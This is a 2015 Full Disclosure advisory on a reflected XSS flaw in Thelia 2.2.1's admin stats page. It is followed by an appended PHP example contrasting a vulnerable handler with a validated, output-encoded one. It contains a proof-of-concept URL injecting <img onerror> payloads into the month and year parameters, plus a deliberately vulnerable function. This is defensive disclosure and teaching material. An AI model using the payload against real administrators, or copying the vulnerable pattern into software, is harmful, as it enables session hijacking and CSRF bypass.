Message-ID: <0M7Fkw-1aHqe42P6E-00x0JF@mrelayeu.kundenserver.de>
Date: Fri, 13 Nov 2015 17:03:21 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] Thelia 2.2.1: XSS

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Thelia 2.2.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: info@...lia.net
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
Thelia 2.2.1 suffers from a reflected XSS vulnerability: the month and year query parameters of the administration "stats" page are written back into the HTML response without validation or output encoding. An attacker who gets a logged-in administrator to open a crafted link can run JavaScript in that administrator's session, which makes it possible, for example, to inject a JavaScript keylogger or to read the page's CSRF token and bypass CSRF protection.

3. Proof of Concept

http://localhost/thelia_2.1.5/web/admin/home/stats?month=95<img src=no onerror=alert(1)>&year=20155<img src=no onerror=alert(2)>

Both parameters are reflected independently; each injected <img> element fires its onerror handler once the page is rendered.

4. Solution

This issue has not been fixed by the vendor.

5. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/Thelia-221-XSS-90.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
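The pattern behind this class of bug, shown as an added example that is not Thelia's code and not part of the original advisory: a minimal stand-in for a stats handler that reflects the month and year parameters. Only the parameter names and the PoC payload come from the advisory; the handler functions, the accepted value ranges and the HTML layout are assumptions made for the illustration. The vulnerable form concatenates the raw query values into the page; the hardened form accepts only an integer in range, refuses to echo anything else, and still HTML-encodes on output so that a later change to the validation cannot reintroduce the injection.

```php
<?php
// Added example, not Thelia's code. The parameter names (month, year) and
// the payload come from the advisory's PoC URL; the function names, value
// ranges and markup are assumptions for the illustration.
declare(strict_types=1);

// Vulnerable form: raw query values are concatenated into the response.
// Anything the browser parses as markup inside month= or year= is rendered.
function renderStatsVulnerable(array $query): string
{
    $month = $query['month'] ?? '';
    $year  = $query['year']  ?? '';
    return "<h2>Stats for {$month}/{$year}</h2>";
}

// Accept only what the parameter can legitimately be: an integer in range.
// Anything else (including "95<img ...>") yields null.
function validatedInt(array $query, string $name, int $min, int $max): ?int
{
    $raw = $query[$name] ?? null;
    if (!is_string($raw)) {
        return null;
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return $value === false ? null : $value;
}

// Hardened form: validate on input, do not reflect rejected values, and
// encode on output as defence in depth.
function renderStatsHardened(array $query): string
{
    $month = validatedInt($query, 'month', 1, 12);
    $year  = validatedInt($query, 'year', 2000, 2100);   // assumed range
    if ($month === null || $year === null) {
        // A generic message; the offending value is never echoed back.
        return '<p>Invalid month or year.</p>';
    }
    $encode = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h2>Stats for ' . $encode((string) $month)
         . '/' . $encode((string) $year) . '</h2>';
}

// Constructed input: the query string of the advisory's PoC URL, parsed the
// way PHP would populate $_GET for that request.
parse_str(
    'month=95<img src=no onerror=alert(1)>&year=20155<img src=no onerror=alert(2)>',
    $poc
);

// The vulnerable handler reproduces both <img ... onerror=...> elements
// verbatim; the hardened handler rejects the request outright.
echo renderStatsVulnerable($poc), PHP_EOL;
echo renderStatsHardened($poc), PHP_EOL;

// A benign request still renders through the hardened path.
parse_str('month=9&year=2015', $benign);
echo renderStatsHardened($benign), PHP_EOL;
```

Run it with `php` on the command line and compare the two lines produced for the PoC query: the first contains the injected elements unchanged, the second contains nothing attacker-controlled. When checking a vendor fix for a bug like this, test both parameters separately, since each is reflected on its own, and confirm the fix validates the value rather than merely stripping the string `<img`, which a different tag or event handler would evade.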